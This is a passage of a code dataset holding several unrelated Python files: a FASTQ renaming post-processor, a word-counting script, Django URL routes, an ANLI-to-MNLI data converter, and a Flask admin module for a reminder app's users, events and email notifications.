yaml.safe_load(sfh)\n for proj in summary['ProjectInfo']:\n add_project(proj)\n\n # Now we can't add any new projects.\n def add_project(proj_name):\n assert proj_name in proj_seen\n except FileNotFoundError:\n log(\"Failed to read seqdata/pipeline/sample_summary.yml. Proceeding anyway.\")\n\n # Some funny-business with UMI reads. These come out as read 2 but we actually want to rename them\n # to _UMI and rename the _3 read as _2. For this reason, gather up the file list first.\n afile = namedtuple(\"afile\", \"samplename lane readnumber project pool_and_library\".split())\n all_fastq = set()\n afile_to_filename = dict()\n\n def translate_read_number(f, set_of_f):\n if f.readnumber == \"2\":\n # If we are dealing with UMI's we'll see a corresponding read3\n if f._replace(readnumber=\"3\") in set_of_f:\n return \"UMI\"\n elif f.readnumber == \"3\":\n assert f._replace(readnumber=\"2\") in set_of_f\n return \"2\"\n return f.readnumber\n\n # Notwithstanding the list of projects obtained by the summary, look for fastq.gz files in all\n # locations.\n # Either we have a list of projects and will find corresponding fastq, or else we have no list and\n # will make it up as we go along.\n for fastq_file in glob(os.path.join( output_dir, \"demultiplexing/lane*\" , \"*/*/*.fastq.gz\" )):\n\n #os.path.split is unhelpful here. 
Just do it the obvious way.\n        # something like: 10528, 10528EJ0019L01, 10528EJpool03_S19_L005_R1_001.fastq.gz\n        lane_dir, project, pool_and_library, filename = fastq_file.split('/')[-4:]\n\n        #Note the project as one we've processed.\n        add_project(project)\n\n        # get information from the filename\n        re_match = re.match( r'(.*)_(S[0-9]+)_L00(\\d)_R(\\d)_\\d+.fastq.gz', filename, re.I)\n\n        if not re_match:\n            log(\"# skipping (regex mismatch) %s\" % fastq_file)\n            continue\n        samplename = re_match.group(1)  # e.g.: We ignore this!\n        lane = re_match.group(3)  # e.g.: L00(5)\n        readnumber = re_match.group(4)  # e.g.: R(1)\n\n        # Check lane matches the directory name\n        if not lane_dir == 'lane{}'.format(lane):\n            log(\"# skipping (lane mismatch) %s\" % fastq_file)\n            continue\n\n        # Add this to the collection\n        thisfile = afile( samplename = samplename,\n                          lane = lane,\n                          readnumber = readnumber,\n                          project = project,\n                          pool_and_library = pool_and_library )\n        all_fastq.add(thisfile)\n        afile_to_filename[thisfile] = fastq_file\n\n    # Now go again for files not in a subdirectory (if Sample_Name was blank)\n    # (apologies for the copy-paste)\n    for fastq_file in glob(os.path.join( output_dir, \"demultiplexing/lane*\" , \"*/*.fastq.gz\" )):\n\n        #os.path.split is unhelpful here. Just do it the obvious way.\n        # something like: 10528, 10528EJ0019L01, 10528EJpool03_S19_L005_R1_001.fastq.gz\n        lane_dir, project, filename = fastq_file.split('/')[-3:]\n\n        #Note the project as one we've processed.\n        add_project(project)\n\n        # get information from the filename\n        # Note this ignores index reads.\n        re_match = re.match( r'(.*)_(S[0-9]+)_L00(\\d)_R(\\d)_\\d+.fastq.gz', filename, re.I)\n\n        if not re_match:\n            log(\"# skipping (regex mismatch) %s\" % fastq_file)\n            continue\n        pool_and_library = re_match.group(1)  # e.g.: 10528EJpool03__10528EJ0019L01\n        lane = re_match.group(3)  # e.g.: L00(5)\n        readnumber = re_match.group(4)  # e.g.: R(1)\n\n        # Check lane matches the directory name\n        if not lane_dir == 'lane{}'.format(lane):\n            log(\"# skipping (lane mismatch) %s\" % fastq_file)\n            continue\n\n        # Add this to the collection\n        thisfile = afile( samplename = '',\n                          lane = lane,\n                          readnumber = readnumber,\n                          project = project,\n                          pool_and_library = pool_and_library )\n        all_fastq.add(thisfile)\n        afile_to_filename[thisfile] = fastq_file\n\n\n    for f in all_fastq:\n        fastq_file = afile_to_filename[f]\n        readnumber = translate_read_number(f, all_fastq)\n\n        # split out library and pool\n        try:\n            pool, library = f.pool_and_library.split('__')\n        except ValueError:\n            #log(\"# skipping (no pool__library) %s\" % fastq_file)\n            #continue\n            # Decided to be a little less strict here. This is also needed for PhiX\n            pool = 'NoPool'\n            library = f.pool_and_library\n\n\n        new_filename = \"{runid}_{f.lane}_{library}_{readnumber}.fastq.gz\".format(**locals())\n        new_filename_relative = os.path.join ( f.project, pool, new_filename )\n        new_filename_absolute = os.path.join ( output_dir, new_filename_relative )\n\n        #Make the directory to put it in\n        os.makedirs(os.path.dirname(new_filename_absolute), exist_ok=True)\n\n        #Paranoia. 
Rather than checking if the file exists, create it exclusively.\n        #That way, no possible race condition that can cause one file to be renamed over\n        #another file (ignoring remote NFS race conditions).\n        try:\n            log( \"mv %s %s\" % ('/'.join(fastq_file.split('/')[-4:]), new_filename_relative) )\n\n            with open(new_filename_absolute, 'x') as tmp_fd:\n                os.replace(fastq_file, new_filename_absolute)\n        except FileExistsError:\n            log(\"# FileExistsError renaming %s\" % new_filename_relative)\n            raise\n\n\n    # Now deal with the undetermined files.\n    undet_fastq = set()\n    for undet_file_absolute in glob(os.path.join( output_dir, \"demultiplexing/lane*\", \"[Uu]ndetermined_*\" )):\n        lane_dir, filename = undet_file_absolute.split('/')[-2:]\n\n        # eg. Undetermined_S0_L004_R1_001.fastq.gz\n        re_match = re.match( r'undetermined_(.*)_L00(\\d)_R(\\d)_\\d+.fastq.gz', filename, re.I)\n\n        if not re_match:\n            log(\"# skipping %s\" % undet_file_absolute)\n            continue\n\n        lane = re_match.group(2)\n        readnumber = re_match.group(3)\n\n        # Check lane matches the directory name\n        if not lane_dir == 'lane{}'.format(lane):\n            log(\"# skipping (lane mismatch) %s\" % undet_file_absolute)\n            continue\n\n        # Add this to the collection\n        thisfile = afile( samplename = 'undetermined',\n                          lane = lane,\n                          readnumber = readnumber,\n                          project = '',\n                          pool_and_library = '' )\n        undet_fastq.add(thisfile)\n        afile_to_filename[thisfile] = undet_file_absolute\n\n    # And process the set we just collected\n    for f in undet_fastq:\n        fastq_file = afile_to_filename[f]\n        readnumber = translate_read_number(f, undet_fastq)\n\n        # eg. 160811_D00261_0355_BC9DA7ANXX_4_unassigned_1.fastq.gz\n        new_filename = \"{runid}_{f.lane}_unassigned_{readnumber}.fastq.gz\".format(**locals())\n\n        new_filename_absolute = os.path.join ( output_dir, new_filename )\n\n        #See comment above\n        try:\n            log( \"mv %s %s\" % ('/'.join(fastq_file.split('/')[-2:]), new_filename) )\n\n            with open(new_filename_absolute, 'x') as tmp_fd:\n                os.rename(fastq_file, new_filename_absolute)\n        except FileExistsError:\n            log(\"# FileExistsError renaming %s\" % new_filename)\n            raise\n\n    # Cleanup empty project directories (as per Cleanup.py) then warn if any dirs\n    # remain (or, in fact, that's an error).\n    for lane_dir in glob(os.path.join(output_dir, \"demultiplexing\", \"lane*\")):\n        for proj in list(proj_seen):\n            for root, dirs, files in os.walk(\n                    os.path.join(lane_dir, proj),\n                    topdown=False ):\n                try:\n                    os.rmdir(root)\n                    log(\"rmdir '%s'\" % root)\n                except Exception:\n                    # Assume it was non-empty.\n                    ERRORS.add(\"Failed to remove all project directories from demultiplexing area.\")\n                    log(\"# could not remove dir '%s'\" % root)\n                    # And we cannot say the project is ready.\n                    proj_seen.discard(proj)\n\n    # Finally return the projects processed\n    return proj_seen\n\nif __name__ == '__main__':\n    print(\"Running: \" + ' '.join(sys.argv))\n    main(*sys.argv[1:])\n    if ERRORS: exit(1)\n","sub_path":"BCL2FASTQPostprocessor.py","file_name":"BCL2FASTQPostprocessor.py","file_ext":"py","file_size_in_byte":12988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"171833261","text":"file = input(\"Enter name of file(including '.txt' extension): \")\r\nwith open(file,'rt') as f:\r\n    data = f.readlines()\r\nwords = []\r\nfor line in data:\r\n    for word in line.split():\r\n        words.append(word)\r\nfreq_map = {}\r\nfor i in words:\r\n    if i in freq_map:\r\n        freq_map[i] += 1\r\n    else:\r\n        freq_map[i] = 1\r\n\r\nfor word in freq_map:\r\n    print(f\"'{word}' - {freq_map[word]} 
times\")\r\n","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109399177","text":"from django.urls import path\n\nfrom . import views\n# from .views import AttendanceRequestCreateView\nurlpatterns = [\n path('', views.all_requests, name='all_requests'),\n path('new_request/', views.create_requuest, name='new_request'),\n path('cr_requests/',views.cr_requests, name='cr_requests'),\n path('amc_requests/',views.amc_requests, name='amc_requests'),\n path('verify_accept/',views.verify_accept, name='verify_accept'),\n path('verify_reject/',views.verify_reject, name='verify_reject'),\n path('/details/', views.request_detail, name='request_detail'),\n]","sub_path":"attendance_request/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405783809","text":"import nli\nimport os\nimport pandas as pd\nimport random\nimport json\n\nDATA_HOME = os.path.join(\"data\", \"nlidata\")\n\nSNLI_HOME = os.path.join(DATA_HOME, \"snli_1.0\")\n\nMULTINLI_HOME = os.path.join(DATA_HOME, \"multinli_1.0\")\n\nANNOTATIONS_HOME = os.path.join(DATA_HOME, \"multinli_1.0_annotations\")\n\nANLI_HOME = os.path.join(DATA_HOME, \"anli_v0.1\")\n\n###################################################################\n# ANLI Round 1 data only\ndef label_anli2mmnli(label):\n if label == \"c\":\n return \"contradiction\"\n elif label == \"e\":\n return \"entailment\"\n elif label == \"n\":\n return \"neutral\"\n else:\n raise IndexError\n\nanli2mnli_round1_dev_jsonl_format = []\n\nfor ex in nli.ANLIDevReader(ANLI_HOME, rounds=(1,)).read():\n jsonl_format = {\n 'annotator_labels': [],\n 'genre': 'slate',\n 'gold_label': label_anli2mmnli(ex.label),\n 'pairID': ex.uid,\n 'promptID': None,\n 'sentence1': ex.context.rstrip(),\n 'sentence1_binary_parse': None,\n 'sentence1_parse': None,\n 'sentence2': ex.hypothesis.rstrip(),\n 'sentence2_binary_parse': None,\n 'sentence2_parse': None\n }\n\n anli2mnli_round1_dev_jsonl_format.append(jsonl_format)\n\nwith open(r'C:\\_hackerreborn\\cs224u\\anli2mnli_round1\\dev_matched.jsonl', 'w', encoding='utf-8') as f:\n for item in anli2mnli_round1_dev_jsonl_format:\n s = json.dumps(item)\n f.write(s + \"\\n\")\n\nwith open(r'C:\\_hackerreborn\\cs224u\\anli2mnli_round1\\dev_matched.tsv', 'w', encoding='utf-8') as f:\n f.write(\"index\tpromptID\tpairID\tgenre\tsentence1_binary_parse\tsentence2_binary_parse\tsentence1_parse\tsentence2_parse\tsentence1\tsentence2\tlabel1\tlabel2\tlabel3\tlabel4\tlabel5\tgold_label\" + \"\\n\")\n for i, item in enumerate(anli2mnli_round1_dev_jsonl_format):\n s = \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\t{7}\\t{8}\\t{9}\\t{10}\\t{11}\\t{12}\\t{13}\\t{14}\\t{15}\".format(\n i,\n item['promptID'],\n item['pairID'],\n item['genre'],\n item['sentence1_binary_parse'],\n item['sentence2_binary_parse'],\n item['sentence1_parse'],\n item['sentence2_parse'],\n item['sentence1'],\n item['sentence2'],\n None,\n None,\n None,\n None,\n None,\n item['gold_label'])\n\n f.write(s + \"\\n\")\n\n####################################################################\n# MNLI data\nmultinli_labels_train = pd.Series(\n [ex.gold_label for ex in nli.MultiNLITrainReader(\n MULTINLI_HOME, filter_unlabeled=False).read()])\n\nmultinli_labels_train.value_counts()\n\nmultinli_labels_dev = pd.Series(\n [ex.gold_label for ex in 
nli.MultiNLIMatchedDevReader(\n        MULTINLI_HOME, filter_unlabeled=True).read()])\n\nmultinli_labels_dev.value_counts()\n\nnli.MultiNLIMatchedDevReader(MULTINLI_HOME, filter_unlabeled=True).read()\n\nfor line in open(os.path.join(MULTINLI_HOME, \"multinli_1.0_dev_matched.jsonl\"), encoding='utf8'):\n    d = json.loads(line)\n    break\n\n# ANLI data\nfor r in (1,2,3):\n    anli_labels_dev = pd.Series(\n        [ex.label == ex.model_label for ex in nli.ANLIDevReader(ANLI_HOME, rounds=(r,)).read()]\n    ).value_counts()\n\n    print(anli_labels_dev)\n\n    anli_labels_dev = pd.Series(\n        [ex.label for ex in nli.ANLIDevReader(ANLI_HOME, rounds=(r,)).read()]\n    ).value_counts()\n\n    print(anli_labels_dev)\n\n    print(\"-----------------\")\n\n#####################################################################\n\n\n\n","sub_path":"_project_trials1_1_eda_anli.py","file_name":"_project_trials1_1_eda_anli.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"202890371","text":"import datetime\nimport json\nimport time\n\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash, abort, current_app, session\nfrom flask_login import current_user\nfrom sqlalchemy import func, desc, asc\nimport requests\nimport elasticsearch.exceptions\n\nfrom reminder.extensions import db, scheduler, cache\nfrom reminder.models import Role, User, Event, Notification, Log\nfrom reminder.main import views as main_views\nfrom reminder.admin import smtp_mail\nfrom reminder.custom_decorators import admin_required, login_required, cancel_click\nfrom reminder.admin.forms import NewUserForm, EditUserForm, NotifyForm\nfrom reminder.custom_wtforms import flash_errors\n\n\nadmin_bp = Blueprint('admin_bp', __name__,\n                     template_folder='templates',\n                     static_folder='static')\n\n\n@admin_bp.before_app_first_request\ndef before_app_req():\n    \"\"\"\n    Refresh an index inside elasticsearch with all the data from the relational side and cache the mail config.\n    \"\"\"\n    # Add all the events and logs from the db to the search index.\n    Event.reindex()\n    Log.reindex()\n    # Caching mail server config - in order to allow the admin to change the configuration\n    # while the application is running (storing mail config data in the db is not desired)\n    cache.set_many({'mail_server': current_app.config.get('MAIL_SERVER'),\n                    'mail_port': current_app.config.get('MAIL_PORT'),\n                    'mail_security': current_app.config.get('MAIL_SECURITY'),\n                    'mail_username': current_app.config.get('MAIL_DEFAULT_SENDER'),\n                    'mail_password': current_app.config.get('MAIL_PASSWORD'),})\n    # cache.clear()\n\n\n@admin_bp.before_request\ndef update_last_seen():\n    \"\"\"\n    Update when the current user was last seen (User.last_seen attribute).\n    \"\"\"\n    if current_user.is_authenticated:\n        current_user.user_seen()\n        db.session.commit()\n\n\ndef background_job():\n    \"\"\"\n    Run process in background.\n    \"\"\"\n    with scheduler.app.app_context():\n        today = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M\")\n        # only for tests\n        # print(today)   # only for tests\n        events_to_notify = Event.query.filter(Event.time_notify <= today,\n                                              Event.is_active == True,\n                                              Event.to_notify == True,\n                                              Event.notification_sent == False).all()\n        try:\n            for event in events_to_notify:\n                users_to_notify = [user for user in event.notified_users]\n                if not users_to_notify:\n                    continue\n                users_notified = smtp_mail.send_email('Attention! 
Upcoming event!',\n users_to_notify,\n event,\n cache.get('mail_server'),\n cache.get('mail_port'),\n cache.get('mail_security'),\n cache.get('mail_username'),\n cache.get('mail_password'))\n current_app.logger_admin.info(f'Notification service: notification has been sent to: {users_notified}')\n # only for test\n # print(f'Mail sent to {users_notified}')\n event.notification_sent = True\n db.session.commit()\n except Exception as error:\n current_app.logger_admin.error(f'Background job error: {error}')\n # Remove job when error occure.\n scheduler.remove_job('my_job_id')\n\n\n@admin_bp.route('/events')\n@login_required\n@admin_required\ndef events():\n \"\"\"\n Display all events from db in Admin Portal.\n \"\"\"\n # Pagination\n events_per_page = 10\n page = request.args.get('page', 1, type=int)\n\n if not request.args or (request.args.get('col') == 'start' and request.args.get('dir') == 'asc'):\n events = Event.query.order_by(\"time_event_start\").paginate(page, events_per_page, True)\n elif request.args.get('col') == 'id' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(desc(Event.id)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'id' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(asc(Event.id)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'start' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(desc(Event.time_event_start)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'start' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(asc(Event.time_event_start)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'stop' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(desc(Event.time_event_stop)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'stop' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(asc(Event.time_event_stop)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'title' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(func.lower(Event.title).asc()).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'title' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(func.lower(Event.title).desc()).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'notify' and request.args.get('dir') == 'yes':\n events = Event.query.filter(Event.to_notify == True).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n elif request.args.get('col') == 'notify' and request.args.get('dir') == 'no':\n events = Event.query.filter(Event.to_notify == False).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n elif request.args.get('col') == 'active' and request.args.get('dir') == 'no':\n events = Event.query.filter(Event.is_active == False).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n elif request.args.get('col') == 'active' and request.args.get('dir') == 'yes':\n events = Event.query.filter(Event.is_active == True).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n else:\n abort(404)\n # Remember additional URL in session, if last event on page - for event deleting feature\n if session.get('prev_endpoint_del'):\n del session['prev_endpoint_del']\n if len(events.items) == 1 and not page == 1:\n session['prev_endpoint_del'] = url_for('admin_bp.events',\n 
col=request.args.get('col'),\n                                               dir=request.args.get('dir'),\n                                               page=page - 1)\n    # Remember current url in session (for back-redirect)\n    if not request.args:\n        session['prev_endpoint'] = url_for('admin_bp.events')\n    else:\n        session['prev_endpoint'] = url_for('admin_bp.events',\n                                           col=request.args.get('col'),\n                                           dir=request.args.get('dir'),\n                                           page=page)\n    # URLs for pagination navigation\n    next_url = url_for('admin_bp.events',\n                       col=request.args.get('col', 'start'),\n                       dir=request.args.get('dir', 'asc'),\n                       page=events.next_num) if events.has_next else None\n    prev_url = url_for('admin_bp.events',\n                       col=request.args.get('col', 'start'),\n                       dir=request.args.get('dir', 'asc'),\n                       page=events.prev_num) if events.has_prev else None\n    return render_template('admin/events.html',\n                           events=events,\n                           title='Events', next_url=next_url,\n                           prev_url=prev_url,\n                           events_per_page=events_per_page)\n\n\n@admin_bp.route('/event/<int:event_id>', methods=['GET', 'POST'])\n@cancel_click()\n@login_required\n@admin_required\ndef event(event_id):\n    \"\"\"\n    Display a particular event's details.\n    The event details in the Admin Portal.\n    \"\"\"\n    event = Event.query.filter_by(id=event_id).first_or_404()\n    # Fetch users that can be notified (only with user role)\n    users_to_notify = User.get_all_standard_users()\n    today = datetime.date.today().strftime(\"%Y-%m-%d\")\n    if request.method == \"POST\":\n        event.title = request.form.get('title')\n        event.details = request.form.get('details')\n        event.all_day_event = True if request.form.get('allday') == 'True' else False\n        event.to_notify = True if request.form.get('to_notify') == 'True' else False\n        if request.form.get('date_notify'):\n            event.time_notify = main_views.str_to_datetime(request.form.get('date_notify'),\n                                                           request.form.get('time_notify'))\n        else:\n            event.time_notify = None\n        event.notification_sent = True if request.form.get('notify_sent') == 'True' else False\n        # Check if the event is an all_day event or not.\n        if request.form.get('time_event_start'):\n            time_event_start_db = main_views.str_to_datetime(request.form.get('date_event_start'),\n                                                             request.form.get('time_event_start'))\n            time_event_stop_db = main_views.str_to_datetime(request.form.get('date_event_stop'),\n                                                            request.form.get('time_event_stop'))\n        else:\n            time_event_start_db = main_views.str_to_datetime(request.form.get('date_event_start'))\n            time_event_stop_db = main_views.str_to_datetime(request.form.get('date_event_stop'))\n        event.time_event_start = time_event_start_db\n        event.time_event_stop = time_event_stop_db\n        # Set users to notify. 
If \"to_notify = False\" the list \"user_form\" is []\n users_form = request.form.getlist('notified_user')\n # Overwrite current users to notify.\n event.notified_users = [User.query.get(user_id) for user_id in users_form]\n db.session.commit()\n flash('Your changes have been saved!', 'success')\n if 'prev_endpoint' in session:\n return redirect(session['prev_endpoint'])\n return redirect(url_for('admin_bp.events'))\n return render_template('admin/event.html', event=event, title='Event details', users=users_to_notify, today=today)\n\n\n@admin_bp.route('/users')\n@login_required\n@admin_required\ndef users():\n \"\"\"\n List user's data from db in Admin Portal.\n \"\"\"\n # Pagination\n users_per_page = 10\n page = request.args.get('page', 1, type=int)\n # Remember current url in session (for back-redirect)\n session['prev_endpoint'] = url_for('admin_bp.users',\n page=request.args.get('page'))\n users = User.query.order_by(func.lower(User.username).asc()).paginate(page, users_per_page, True)\n # URLs for pagination navigation\n next_url = url_for('admin_bp.users',\n page=users.next_num) if users.has_next else None\n prev_url = url_for('admin_bp.users',\n page=users.prev_num) if users.has_prev else None\n\n return render_template('admin/users.html',\n users=users,\n title='Users',\n prev_url=prev_url,\n next_url=next_url,\n users_per_page=users_per_page)\n\n\ndef check_user_exist(request, user_edited=None):\n \"\"\"\n Check if username and email already exist in db.\n \"\"\"\n username_from_form = request.form.get('username')\n email_from_form = request.form.get('email')\n user_exist, email_exist = None, None\n if user_edited:\n # When the user is edited\n if user_edited.username != username_from_form:\n user_exist = User.query.filter_by(username=username_from_form).first()\n if user_edited.email != email_from_form:\n email_exist = User.query.filter_by(email=email_from_form).first()\n else:\n # When a new user is created\n user_exist = User.query.filter_by(username=username_from_form).first()\n email_exist = User.query.filter_by(email=email_from_form).first()\n if user_exist or email_exist:\n access_from_form = True if request.form.get('access') == 'True' else False\n roleid_from_form = request.form.get('role')\n pass_reset_from_form = True if request.form.get('pass_reset') == 'True' else False\n form_content = {\n 'username': username_from_form,\n 'email': email_from_form,\n 'access': access_from_form,\n 'roleid': True if roleid_from_form == 'admin' else False,\n 'pass_reset': pass_reset_from_form,\n }\n if user_exist and email_exist:\n flash(f'Sorry! Username \"{username_from_form}\" and email \"{email_from_form}\" are already taken. '\n f'Please try something different.', 'danger')\n elif email_exist:\n flash(f'Sorry! Email \"{email_from_form}\" is already taken. Please try something different.', 'danger')\n else:\n flash(f'Sorry! Username \"{username_from_form}\" is already taken. 
Please try something different.', 'danger')\n        return form_content\n\n\n@admin_bp.route('/new_user', methods=['GET', 'POST'])\n@cancel_click('admin_bp.users')\n@login_required\n@admin_required\ndef new_user():\n    \"\"\"\n    Add new user to db.\n    \"\"\"\n    if request.method == \"POST\":\n        form = NewUserForm()\n        # Validate form data on server-side\n        if form.validate_on_submit():\n            # Check if username and email already exist in db.\n            user_exist = check_user_exist(request)\n            if user_exist:\n                return render_template('admin/new_user.html', title='New user', form_prev_input=form)\n            username_form = request.form.get('username')\n            email_form = request.form.get('email')\n            password_form = request.form.get('password')\n            user = User(username=username_form,\n                        email=email_form,\n                        access_granted=True if request.form.get('access') == 'True' else False,\n                        pass_change_req=True if request.form.get('pass_reset') == 'True' else False,\n                        role_id=str(Role.query.filter_by(name=request.form.get('role')).first().id))\n            user.set_password(password_form)\n            db.session.add(user)\n            db.session.commit()\n            current_app.logger_admin.info(f'User \"{user.username}\" has been added to db')\n            flash(f'User \"{user.username}\" has been added!', 'success')\n            return redirect(url_for('admin_bp.users'))\n        if form.errors:\n            flash_errors(form)\n            # Render previous user input in form fields\n            return render_template('admin/new_user.html', title='New user', form_prev_input=form)\n    return render_template('admin/new_user.html', title='New user')\n\n\n@admin_bp.route('/user/<int:user_id>', methods=['GET', 'POST'])\n@cancel_click()\n@login_required\n@admin_required\ndef user(user_id):\n    \"\"\"\n    Editing a user already existing in the db.\n    \"\"\"\n    user = User.query.filter_by(id=user_id).first_or_404()\n    if request.method == \"POST\":\n        form = EditUserForm()\n        # Validate form data on server-side\n        if form.validate_on_submit():\n            # Check if the newly assigned username or email already exists in db.\n            user_exist = check_user_exist(request, user)\n            if user_exist:\n                return render_template('admin/user.html', form_prev_input=form)\n            username_form = request.form.get('username')\n            email_form = request.form.get('email')\n            password_form = request.form.get('password')\n            user.username = username_form\n            user.email = email_form\n            if request.form.get('access') == 'True' and str(user.access_granted) != request.form.get('access'):\n                user.failed_login_attempts = 0\n            user.access_granted = True if request.form.get('access') == 'True' else False\n            user.pass_change_req = True if request.form.get('pass_reset') == 'True' else False\n            user.role_id = str(Role.query.filter_by(name=request.form.get('role')).first().id)\n            # Check whether password has been changed\n            if password_form and not user.check_password(password_form):\n                user.set_password(password_form)\n            db.session.commit()\n            current_app.logger_admin.info(f'User \"{user.username}\" data has been changed')\n            flash('Your changes have been saved!', 'success')\n            return redirect(url_for('admin_bp.users'))\n        if form.errors:\n            flash_errors(form)\n            # Render previous user input in form fields\n            return render_template('admin/user.html', form_prev_input=form)\n    return render_template('admin/user.html', user=user)\n\n\n@admin_bp.route('/del_user/<int:user_id>')\n@login_required\n@admin_required\ndef del_user(user_id):\n    \"\"\"\n    Delete user data in db.\n    \"\"\"\n    if current_user.id == user_id:\n        flash(\"Sorry! 
You can't delete yourself!\", 'danger')\n        return redirect(url_for('admin_bp.users'))\n    user = User.query.filter_by(id=user_id).first()\n    current_app.logger_admin.warning(f'User \"{user.username}\" has been deleted from db')\n    db.session.delete(user)\n    db.session.commit()\n    flash(f'User \"{user.username}\" has been deleted!', 'success')\n    if 'prev_endpoint' in session:\n        return redirect(session['prev_endpoint'])\n    return redirect(url_for('admin_bp.users'))\n\n\n@admin_bp.route('/del_event/<int:event_id>')\n@login_required\n@admin_required\ndef del_event(event_id):\n    \"\"\"\n    Delete event data from db - permanent.\n    \"\"\"\n    event = Event.query.filter_by(id=event_id).first()\n    db.session.delete(event)\n    db.session.commit()\n    flash(f'Event with title \"{event.title}\" has been permanently deleted!', 'success')\n    # Custom small delay when deleting search results from db (for better elasticsearch performance)\n    if 'search' in session.get('prev_endpoint'):\n        time.sleep(1)\n    if session.get('prev_endpoint_del'):\n        return redirect(session.get('prev_endpoint_del'))\n    elif session.get('prev_endpoint'):\n        return redirect(session['prev_endpoint'])\n    return redirect(url_for('admin_bp.events'))\n\n\n@admin_bp.route('/act_event/<int:event_id>')\n@login_required\n@admin_required\ndef act_event(event_id):\n    \"\"\"\n    Activate/deactivate the event to control whether it is visible to standard users.\n    \"\"\"\n    event = Event.query.filter_by(id=event_id).first()\n    if event.is_active:\n        event.is_active = False\n        db.session.commit()\n        flash(f'Event with title \"{event.title}\" has been deactivated!', 'success')\n    else:\n        event.is_active = True\n        db.session.commit()\n        flash(f'Event with title \"{event.title}\" has been activated!', 'success')\n    # Redirect to previous URL\n    if 'prev_endpoint' in session:\n        return redirect(session['prev_endpoint'])\n    return redirect(url_for('admin_bp.events'))\n\n\n@admin_bp.route('/notify/', methods=['GET', 'POST'])\n@cancel_click('admin_bp.dashboard')\n@login_required\n@admin_required\ndef notify():\n    \"\"\"\n    Allows starting the notification service and changing the service configuration.\n    \"\"\"\n    # only for test\n    # print(scheduler.get_jobs(jobstore='default'))\n    # Get mail config from cache\n    mail_config_cache = cache.get_dict('mail_server',\n                                       'mail_port',\n                                       'mail_security',\n                                       'mail_username',\n                                       'mail_password')\n    # Notification config data (for interval and interval unit).\n    notification_config = Notification.query.first()\n    # Mail config data.\n    notify_config = mail_config_cache.copy()\n    notify_config['notify_unit'] = notification_config.notify_unit\n    notify_config['notify_interval'] = notification_config.notify_interval\n    if request.method == \"POST\":\n        form = NotifyForm()\n        # Validate form data on server-side\n        if form.validate_on_submit():\n            # Fetch data from form.\n            notify_status_form = request.form.get('notify_status')\n            notify_unit_form = request.form.get('notify_unit')\n            notify_interval_form = int(request.form.get('notify_interval'))\n            # Checks whether the data provided in the form differs from those stored in the cache\n            # and updates the data in 'notify_config' dict and config object (if required).\n            config_changed = False\n            for key, val in notify_config.items():\n                if key in form.data.keys() and key in mail_config_cache.keys():\n                    if notify_config[key] != str(form.data[key]) and str(form.data[key]) != '':\n                        cache.set(key, str(form.data[key]))\n                        notify_config[key] = str(form.data[key])\n                        config_changed = True\n                        # print(key, form.data[key])\n            # Checks whether the data provided in the form differs from those stored in the 
db\n            if notify_unit_form != notify_config['notify_unit'] or \\\n                    notify_interval_form != notify_config['notify_interval']:\n                notification_config.notify_unit = notify_unit_form\n                notification_config.notify_interval = notify_interval_form\n                db.session.commit()\n                # Update the rest of the data in 'notify_config' dict.\n                notify_config['notify_unit'] = notify_unit_form\n                notify_config['notify_interval'] = notify_interval_form\n                config_changed = True\n            # Test mail configuration before running service\n            if notify_status_form == 'on':\n                test_mail_config = smtp_mail.test_email(notify_config['mail_server'],\n                                                        notify_config['mail_port'],\n                                                        notify_config['mail_security'],\n                                                        notify_config['mail_username'],\n                                                        notify_config['mail_password'])\n            else:\n                test_mail_config = False\n            # Notification service engine\n            if not notify_status_form and scheduler.get_jobs():\n                scheduler.remove_job('my_job_id')\n                current_app.logger_admin.info(f'Notification service has been turned off by \"{current_user.username}\"')\n                flash('The notify service has been turned off!', 'success')\n            elif scheduler.get_jobs() and not test_mail_config:\n                scheduler.remove_job('my_job_id')\n            elif notify_status_form == 'on' and test_mail_config:\n                if not scheduler.get_jobs():\n                    current_app.logger_admin.info(f'Notification service has been started by \"{current_user.username}\"')\n                else:\n                    current_app.logger_admin.info(f'Notification service config has been changed by '\n                                                  f'\"{current_user.username}\"')\n                if notify_unit_form == 'seconds':\n                    scheduler.add_job(func=background_job, trigger='interval', replace_existing=True, max_instances=1,\n                                      seconds=notify_interval_form, id='my_job_id')\n                elif notify_unit_form == 'minutes':\n                    scheduler.add_job(func=background_job, trigger='interval', replace_existing=True, max_instances=1,\n                                      minutes=notify_interval_form, id='my_job_id')\n                else:\n                    scheduler.add_job(func=background_job, trigger='interval', replace_existing=True, max_instances=1,\n                                      hours=notify_interval_form, id='my_job_id')\n                flash('Connection with mail server established correctly! 
